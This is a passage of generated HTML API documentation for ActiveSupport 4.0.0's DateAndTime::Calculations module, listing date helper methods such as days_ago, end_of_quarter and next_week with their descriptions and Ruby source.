<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 174</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">beginning_of_week</span>(<span class="ruby-identifier">start_day</span> = <span class="ruby-constant">Date</span>.<span class="ruby-identifier">beginning_of_week</span>)
<span class="ruby-identifier">result</span> = <span class="ruby-identifier">days_ago</span>(<span class="ruby-identifier">days_to_week_start</span>(<span class="ruby-identifier">start_day</span>))
<span class="ruby-identifier">acts_like?</span>(<span class="ruby-value">:time</span>) <span class="ruby-operator">?</span> <span class="ruby-identifier">result</span>.<span class="ruby-identifier">midnight</span> <span class="ruby-operator">:</span> <span class="ruby-identifier">result</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-beginning_of_year">
<b>beginning_of_year</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-beginning_of_year" name="method-i-beginning_of_year" class="permalink">Link</a>
</div>
<div class="description">
<p>Return a new date/time at the beginning of the year. Example: 1st January.
<a href="../DateTime.html">DateTime</a> objects will have a time set to
0:00.</p>
</div>
<div class="aka">
Also aliased as: <a href="Calculations.html#method-i-at_beginning_of_year">at_beginning_of_year</a>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-beginning_of_year_source')" id="l_method-i-beginning_of_year_source">show</a>
</p>
<div id="method-i-beginning_of_year_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 106</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">beginning_of_year</span>
<span class="ruby-identifier">change</span>(<span class="ruby-value">:month</span> =<span class="ruby-operator">></span> <span class="ruby-number">1</span>).<span class="ruby-identifier">beginning_of_month</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-days_ago">
<b>days_ago</b>(days)
<a href="../../classes/DateAndTime/Calculations.html#method-i-days_ago" name="method-i-days_ago" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time the specified number of days ago.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-days_ago_source')" id="l_method-i-days_ago_source">show</a>
</p>
<div id="method-i-days_ago_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 39</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">days_ago</span>(<span class="ruby-identifier">days</span>)
<span class="ruby-identifier">advance</span>(<span class="ruby-value">:days</span> =<span class="ruby-operator">></span> <span class="ruby-operator">-</span><span class="ruby-identifier">days</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-days_since">
<b>days_since</b>(days)
<a href="../../classes/DateAndTime/Calculations.html#method-i-days_since" name="method-i-days_since" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time the specified number of days in the future.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-days_since_source')" id="l_method-i-days_since_source">show</a>
</p>
<div id="method-i-days_since_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 44</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">days_since</span>(<span class="ruby-identifier">days</span>)
<span class="ruby-identifier">advance</span>(<span class="ruby-value">:days</span> =<span class="ruby-operator">></span> <span class="ruby-identifier">days</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-days_to_week_start">
<b>days_to_week_start</b>(start_day = Date.beginning_of_week)
<a href="../../classes/DateAndTime/Calculations.html#method-i-days_to_week_start" name="method-i-days_to_week_start" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns the number of days to the start of the week on the given day. Week
is assumed to start on <code>start_day</code>, default is
<code>Date.beginning_of_week</code> or
<code>config.beginning_of_week</code> when set.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-days_to_week_start_source')" id="l_method-i-days_to_week_start_source">show</a>
</p>
<div id="method-i-days_to_week_start_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 164</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">days_to_week_start</span>(<span class="ruby-identifier">start_day</span> = <span class="ruby-constant">Date</span>.<span class="ruby-identifier">beginning_of_week</span>)
<span class="ruby-identifier">start_day_number</span> = <span class="ruby-constant">DAYS_INTO_WEEK</span>[<span class="ruby-identifier">start_day</span>]
<span class="ruby-identifier">current_day_number</span> = <span class="ruby-identifier">wday</span> <span class="ruby-operator">!=</span> <span class="ruby-number">0</span> <span class="ruby-operator">?</span> <span class="ruby-identifier">wday</span> <span class="ruby-operator">-</span> <span class="ruby-number">1</span> <span class="ruby-operator">:</span> <span class="ruby-number">6</span>
(<span class="ruby-identifier">current_day_number</span> <span class="ruby-operator">-</span> <span class="ruby-identifier">start_day_number</span>) <span class="ruby-operator">%</span> <span class="ruby-number">7</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-end_of_month">
<b>end_of_month</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-end_of_month" name="method-i-end_of_month" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time representing the end of the month. <a
href="../DateTime.html">DateTime</a> objects will have a time set to
23:59:59.</p>
</div>
<div class="aka">
Also aliased as: <a href="Calculations.html#method-i-at_end_of_month">at_end_of_month</a>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-end_of_month_source')" id="l_method-i-end_of_month_source">show</a>
</p>
<div id="method-i-end_of_month_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 203</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">end_of_month</span>
<span class="ruby-identifier">last_day</span> = <span class="ruby-operator">::</span><span class="ruby-constant">Time</span>.<span class="ruby-identifier">days_in_month</span>(<span class="ruby-identifier">month</span>, <span class="ruby-identifier">year</span>)
<span class="ruby-identifier">last_hour</span>{ <span class="ruby-identifier">days_since</span>(<span class="ruby-identifier">last_day</span> <span class="ruby-operator">-</span> <span class="ruby-identifier">day</span>) }
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-end_of_quarter">
<b>end_of_quarter</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-end_of_quarter" name="method-i-end_of_quarter" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time at the end of the quarter. Example: 31st March,
30th June, 30th September. <a href="../DateTime.html">DateTime</a> objects
will have a time set to 23:59:59.</p>
</div>
<div class="aka">
Also aliased as: <a href="Calculations.html#method-i-at_end_of_quarter">at_end_of_quarter</a>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-end_of_quarter_source')" id="l_method-i-end_of_quarter_source">show</a>
</p>
<div id="method-i-end_of_quarter_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 97</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">end_of_quarter</span>
<span class="ruby-identifier">last_quarter_month</span> = [<span class="ruby-number">3</span>, <span class="ruby-number">6</span>, <span class="ruby-number">9</span>, <span class="ruby-number">12</span>].<span class="ruby-identifier">detect</span> { <span class="ruby-operator">|</span><span class="ruby-identifier">m</span><span class="ruby-operator">|</span> <span class="ruby-identifier">m</span> <span class="ruby-operator">>=</span> <span class="ruby-identifier">month</span> }
<span class="ruby-identifier">beginning_of_month</span>.<span class="ruby-identifier">change</span>(<span class="ruby-value">:month</span> =<span class="ruby-operator">></span> <span class="ruby-identifier">last_quarter_month</span>).<span class="ruby-identifier">end_of_month</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-end_of_week">
<b>end_of_week</b>(start_day = Date.beginning_of_week)
<a href="../../classes/DateAndTime/Calculations.html#method-i-end_of_week" name="method-i-end_of_week" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time representing the end of this week on the given day.
Week is assumed to start on <code>start_day</code>, default is
<code>Date.beginning_of_week</code> or
<code>config.beginning_of_week</code> when set. <a
href="../DateTime.html">DateTime</a> objects have their time set to
23:59:59.</p>
</div>
<div class="aka">
Also aliased as: <a href="Calculations.html#method-i-at_end_of_week">at_end_of_week</a>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-end_of_week_source')" id="l_method-i-end_of_week_source">show</a>
</p>
<div id="method-i-end_of_week_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 190</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">end_of_week</span>(<span class="ruby-identifier">start_day</span> = <span class="ruby-constant">Date</span>.<span class="ruby-identifier">beginning_of_week</span>)
<span class="ruby-identifier">last_hour</span>{ <span class="ruby-identifier">days_since</span>(<span class="ruby-number">6</span> <span class="ruby-operator">-</span> <span class="ruby-identifier">days_to_week_start</span>(<span class="ruby-identifier">start_day</span>)) }
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-end_of_year">
<b>end_of_year</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-end_of_year" name="method-i-end_of_year" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time representing the end of the year. <a
href="../DateTime.html">DateTime</a> objects will have a time set to
23:59:59.</p>
</div>
<div class="aka">
Also aliased as: <a href="Calculations.html#method-i-at_end_of_year">at_end_of_year</a>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-end_of_year_source')" id="l_method-i-end_of_year_source">show</a>
</p>
<div id="method-i-end_of_year_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 211</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">end_of_year</span>
<span class="ruby-identifier">change</span>(<span class="ruby-value">:month</span> =<span class="ruby-operator">></span> <span class="ruby-number">12</span>).<span class="ruby-identifier">end_of_month</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-future-3F">
<b>future?</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-future-3F" name="method-i-future-3F" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns true if the date/time is in the future.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-future-3F_source')" id="l_method-i-future-3F_source">show</a>
</p>
<div id="method-i-future-3F_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 34</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">future?</span>
<span class="ruby-keyword">self</span> <span class="ruby-operator">></span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">class</span>.<span class="ruby-identifier">current</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-last_month">
<b>last_month</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-last_month" name="method-i-last_month" class="permalink">Link</a>
</div>
<div class="description">
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-last_quarter">
<b>last_quarter</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-last_quarter" name="method-i-last_quarter" class="permalink">Link</a>
</div>
<div class="description">
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-last_week">
<b>last_week</b>(start_day = Date.beginning_of_week)
<a href="../../classes/DateAndTime/Calculations.html#method-i-last_week" name="method-i-last_week" class="permalink">Link</a>
</div>
<div class="description">
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-last_year">
<b>last_year</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-last_year" name="method-i-last_year" class="permalink">Link</a>
</div>
<div class="description">
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-monday">
<b>monday</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-monday" name="method-i-monday" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns Monday of this week assuming that week starts on Monday.
<code>DateTime</code> objects have their time set to 0:00.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-monday_source')" id="l_method-i-monday_source">show</a>
</p>
<div id="method-i-monday_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 182</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">monday</span>
<span class="ruby-identifier">beginning_of_week</span>(<span class="ruby-value">:monday</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-months_ago">
<b>months_ago</b>(months)
<a href="../../classes/DateAndTime/Calculations.html#method-i-months_ago" name="method-i-months_ago" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time the specified number of months ago.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-months_ago_source')" id="l_method-i-months_ago_source">show</a>
</p>
<div id="method-i-months_ago_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 59</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">months_ago</span>(<span class="ruby-identifier">months</span>)
<span class="ruby-identifier">advance</span>(<span class="ruby-value">:months</span> =<span class="ruby-operator">></span> <span class="ruby-operator">-</span><span class="ruby-identifier">months</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-months_since">
<b>months_since</b>(months)
<a href="../../classes/DateAndTime/Calculations.html#method-i-months_since" name="method-i-months_since" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time the specified number of months in the future.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-months_since_source')" id="l_method-i-months_since_source">show</a>
</p>
<div id="method-i-months_since_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 64</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">months_since</span>(<span class="ruby-identifier">months</span>)
<span class="ruby-identifier">advance</span>(<span class="ruby-value">:months</span> =<span class="ruby-operator">></span> <span class="ruby-identifier">months</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-next_month">
<b>next_month</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-next_month" name="method-i-next_month" class="permalink">Link</a>
</div>
<div class="description">
<p>Short-hand for <a
href="Calculations.html#method-i-months_since">#months_since</a>(1).</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-next_month_source')" id="l_method-i-next_month_source">show</a>
</p>
<div id="method-i-next_month_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 120</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">next_month</span>
<span class="ruby-identifier">months_since</span>(<span class="ruby-number">1</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-next_quarter">
<b>next_quarter</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-next_quarter" name="method-i-next_quarter" class="permalink">Link</a>
</div>
<div class="description">
<p>Short-hand for <a
href="Calculations.html#method-i-months_since">#months_since</a>(3)</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-next_quarter_source')" id="l_method-i-next_quarter_source">show</a>
</p>
<div id="method-i-next_quarter_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 125</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">next_quarter</span>
<span class="ruby-identifier">months_since</span>(<span class="ruby-number">3</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-next_week">
<b>next_week</b>(given_day_in_next_week = Date.beginning_of_week)
<a href="../../classes/DateAndTime/Calculations.html#method-i-next_week" name="method-i-next_week" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time representing the given day in the next week. The
<code>given_day_in_next_week</code> defaults to the beginning of the week
which is determined by <code>Date.beginning_of_week</code> or
<code>config.beginning_of_week</code> when set. <code>DateTime</code>
objects have their time set to 0:00.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-next_week_source')" id="l_method-i-next_week_source">show</a>
</p>
<div id="method-i-next_week_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 115</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">next_week</span>(<span class="ruby-identifier">given_day_in_next_week</span> = <span class="ruby-constant">Date</span>.<span class="ruby-identifier">beginning_of_week</span>)
<span class="ruby-identifier">first_hour</span>{ <span class="ruby-identifier">weeks_since</span>(<span class="ruby-number">1</span>).<span class="ruby-identifier">beginning_of_week</span>.<span class="ruby-identifier">days_since</span>(<span class="ruby-identifier">days_span</span>(<span class="ruby-identifier">given_day_in_next_week</span>)) }
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-next_year">
<b>next_year</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-next_year" name="method-i-next_year" class="permalink">Link</a>
</div>
<div class="description">
<p>Short-hand for <a
href="Calculations.html#method-i-years_since">#years_since</a>(1).</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-next_year_source')" id="l_method-i-next_year_source">show</a>
</p>
<div id="method-i-next_year_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 130</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">next_year</span>
<span class="ruby-identifier">years_since</span>(<span class="ruby-number">1</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-past-3F">
<b>past?</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-past-3F" name="method-i-past-3F" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns true if the date/time is in the past.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-past-3F_source')" id="l_method-i-past-3F_source">show</a>
</p>
<div id="method-i-past-3F_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 29</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">past?</span>
<span class="ruby-keyword">self</span> <span class="ruby-operator"><</span> <span class="ruby-keyword">self</span>.<span class="ruby-identifier">class</span>.<span class="ruby-identifier">current</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-prev_month">
<b>prev_month</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-prev_month" name="method-i-prev_month" class="permalink">Link</a>
</div>
<div class="description">
<p>Short-hand for <a
href="Calculations.html#method-i-months_ago">#months_ago</a>(1).</p>
</div>
<div class="aka">
Also aliased as: <a href="Calculations.html#method-i-last_month">last_month</a>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-prev_month_source')" id="l_method-i-prev_month_source">show</a>
</p>
<div id="method-i-prev_month_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 144</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">prev_month</span>
<span class="ruby-identifier">months_ago</span>(<span class="ruby-number">1</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-prev_quarter">
<b>prev_quarter</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-prev_quarter" name="method-i-prev_quarter" class="permalink">Link</a>
</div>
<div class="description">
<p>Short-hand for <a
href="Calculations.html#method-i-months_ago">#months_ago</a>(3).</p>
</div>
<div class="aka">
Also aliased as: <a href="Calculations.html#method-i-last_quarter">last_quarter</a>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-prev_quarter_source')" id="l_method-i-prev_quarter_source">show</a>
</p>
<div id="method-i-prev_quarter_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 150</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">prev_quarter</span>
<span class="ruby-identifier">months_ago</span>(<span class="ruby-number">3</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-prev_week">
<b>prev_week</b>(start_day = Date.beginning_of_week)
<a href="../../classes/DateAndTime/Calculations.html#method-i-prev_week" name="method-i-prev_week" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time representing the given day in the previous week.
Week is assumed to start on <code>start_day</code>, default is
<code>Date.beginning_of_week</code> or
<code>config.beginning_of_week</code> when set. <a
href="../DateTime.html">DateTime</a> objects have their time set to 0:00.</p>
</div>
<div class="aka">
Also aliased as: <a href="Calculations.html#method-i-last_week">last_week</a>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-prev_week_source')" id="l_method-i-prev_week_source">show</a>
</p>
<div id="method-i-prev_week_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 138</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">prev_week</span>(<span class="ruby-identifier">start_day</span> = <span class="ruby-constant">Date</span>.<span class="ruby-identifier">beginning_of_week</span>)
<span class="ruby-identifier">first_hour</span>{ <span class="ruby-identifier">weeks_ago</span>(<span class="ruby-number">1</span>).<span class="ruby-identifier">beginning_of_week</span>.<span class="ruby-identifier">days_since</span>(<span class="ruby-identifier">days_span</span>(<span class="ruby-identifier">start_day</span>)) }
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-prev_year">
<b>prev_year</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-prev_year" name="method-i-prev_year" class="permalink">Link</a>
</div>
<div class="description">
<p>Short-hand for <a
href="Calculations.html#method-i-years_ago">#years_ago</a>(1).</p>
</div>
<div class="aka">
Also aliased as: <a href="Calculations.html#method-i-last_year">last_year</a>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-prev_year_source')" id="l_method-i-prev_year_source">show</a>
</p>
<div id="method-i-prev_year_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 156</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">prev_year</span>
<span class="ruby-identifier">years_ago</span>(<span class="ruby-number">1</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-sunday">
<b>sunday</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-sunday" name="method-i-sunday" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns Sunday of this week assuming that week starts on Monday.
<code>DateTime</code> objects have their time set to 23:59:59.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-sunday_source')" id="l_method-i-sunday_source">show</a>
</p>
<div id="method-i-sunday_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 197</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">sunday</span>
<span class="ruby-identifier">end_of_week</span>(<span class="ruby-value">:monday</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-today-3F">
<b>today?</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-today-3F" name="method-i-today-3F" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns true if the date/time is today.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-today-3F_source')" id="l_method-i-today-3F_source">show</a>
</p>
<div id="method-i-today-3F_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 24</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">today?</span>
<span class="ruby-identifier">to_date</span> <span class="ruby-operator">==</span> <span class="ruby-operator">::</span><span class="ruby-constant">Date</span>.<span class="ruby-identifier">current</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-tomorrow">
<b>tomorrow</b>()
<a href="../../classes/DateAndTime/Calculations.html#method-i-tomorrow" name="method-i-tomorrow" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time representing tomorrow.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-tomorrow_source')" id="l_method-i-tomorrow_source">show</a>
</p>
<div id="method-i-tomorrow_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 19</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">tomorrow</span>
<span class="ruby-identifier">advance</span>(<span class="ruby-value">:days</span> =<span class="ruby-operator">></span> <span class="ruby-number">1</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-weeks_ago">
<b>weeks_ago</b>(weeks)
<a href="../../classes/DateAndTime/Calculations.html#method-i-weeks_ago" name="method-i-weeks_ago" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time the specified number of weeks ago.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-weeks_ago_source')" id="l_method-i-weeks_ago_source">show</a>
</p>
<div id="method-i-weeks_ago_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/activesupport-4.0.0/lib/active_support/core_ext/date_and_time/calculations.rb, line 49</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">weeks_ago</span>(<span class="ruby-identifier">weeks</span>)
<span class="ruby-identifier">advance</span>(<span class="ruby-value">:weeks</span> =<span class="ruby-operator">></span> <span class="ruby-operator">-</span><span class="ruby-identifier">weeks</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-weeks_since">
<b>weeks_since</b>(weeks)
<a href="../../classes/DateAndTime/Calculations.html#method-i-weeks_since" name="method-i-weeks_since" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a new date/time the specified number of weeks in the future.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-weeks_since_source')" id="l_method-i-weeks_since_source">show</a>
</p>
<div id="method-i-weeks_since_source" class="dyn-source">
